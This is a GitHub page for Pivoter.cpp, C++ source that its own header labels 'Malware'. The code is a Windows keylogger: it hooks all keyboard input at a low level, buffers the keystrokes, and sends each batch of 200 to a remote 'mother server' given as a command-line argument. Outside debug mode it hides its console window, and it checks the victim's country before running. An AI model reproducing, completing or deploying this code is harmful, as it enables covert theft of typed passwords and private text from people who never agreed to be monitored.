-
Notifications
You must be signed in to change notification settings - Fork 0
/
Pivoter.cpp
133 lines (110 loc) · 3 KB
/
Pivoter.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
/*
Project name: Pivoter
Project 1-Word Description: Malware
Author: Kevin Jerebica ( Osamu-KJ )
*/
#include <iostream>
#include <string.h>
#include <Windows.h>
#include <WinUser.h>
#include <vector>
#include "codes.h"
#include "connections_pivoter.h"
#include "security_checker.h"
#define DEBUG TRUE
#define KEYS_LIMIT 200
HHOOK keyboard_events_hook;
std::vector<std::string> virt_codes;
std::vector<std::string> thread_codes;
ConnectionsPivoter mother_server_pv = ConnectionsPivoter();
DWORD WINAPI send_codes_thread_function(LPVOID keys) {
std::vector<std::string>* keys_ptr = static_cast<std::vector<std::string>*>(keys);
bool res = mother_server_pv.send_codes(*keys_ptr);
if (DEBUG && !res) {
std::cout << "Failed sending to the mother server!" << std::endl;
return 1;
}
return 0;
}
void stack_codes() {
if (virt_codes.size() < KEYS_LIMIT)
return;
thread_codes = virt_codes;
HANDLE thread = CreateThread(NULL, 0, send_codes_thread_function, &thread_codes, 0, NULL);
virt_codes.clear();
}
LRESULT CALLBACK keyboard_callback(int nCode, WPARAM wParam, LPARAM lParam) {
switch (wParam) {
case WM_KEYDOWN:
case WM_SYSKEYDOWN:
case WM_KEYUP:
case WM_SYSKEYUP:
KBDLLHOOKSTRUCT* kbd_struct = (KBDLLHOOKSTRUCT*)lParam;
DWORD virt_code = kbd_struct->vkCode;
std::string prefix;
switch (wParam) {
case WM_KEYDOWN:
case WM_SYSKEYDOWN:
prefix = "DOWN_";
break;
case WM_KEYUP:
case WM_SYSKEYUP:
prefix = "UP_";
break;
}
std::string string_key_code = prefix + VIRTUAL_KEY_CODE_TABLE[virt_code].name;
if (DEBUG) {
std::cout << "Key pressed: " << string_key_code << std::endl;
std::cout << "Len of the vector: " << virt_codes.size() << std::endl;
}
virt_codes.push_back(string_key_code);
stack_codes();
break;
}
return CallNextHookEx(keyboard_events_hook, nCode, wParam, lParam);
}
/*
ARGUMENTS:
- 1: initial mother server ip
- 2: whitelisted country
*/
int main(int argc, char** argv) {
// security Checks
if (!check_country(argv[2]))
return 0;
if (argc != 3) {
std::cout << "Error: wrong use of arguments!" << std::endl;
return 1;
}
if (DEBUG)
for (int i = 0; i < argc; i++)
std::cout << "Argument " << i << " value: " << argv[i] << std::endl;
else
ShowWindow(GetConsoleWindow(), SW_HIDE);
mother_server_pv.url = argv[1];
mother_server_pv.allowed_country = argv[2];
keyboard_events_hook = SetWindowsHookExA(WH_KEYBOARD_LL, keyboard_callback, 0, 0);
STARTUPINFOA startup_info;
PROCESS_INFORMATION process_info;
memset(&startup_info, 0, sizeof(STARTUPINFOA));
memset(&process_info, 0, sizeof(PROCESS_INFORMATION));
startup_info.cb = sizeof(startup_info);
/*BOOL test = CreateProcessA(
NULL,
(LPSTR) "curl http://192.168.1.108",
NULL,
NULL,
false,
CREATE_NO_WINDOW,
NULL,
NULL,
&startup_info,
&process_info);
if (test == FALSE) {
std::cout << "problem!" << std::endl;
}*/
// EVENT LOOP
while (GetMessage(NULL, NULL, 0, 0));
UnhookWindowsHookEx(keyboard_events_hook);
return 0;
}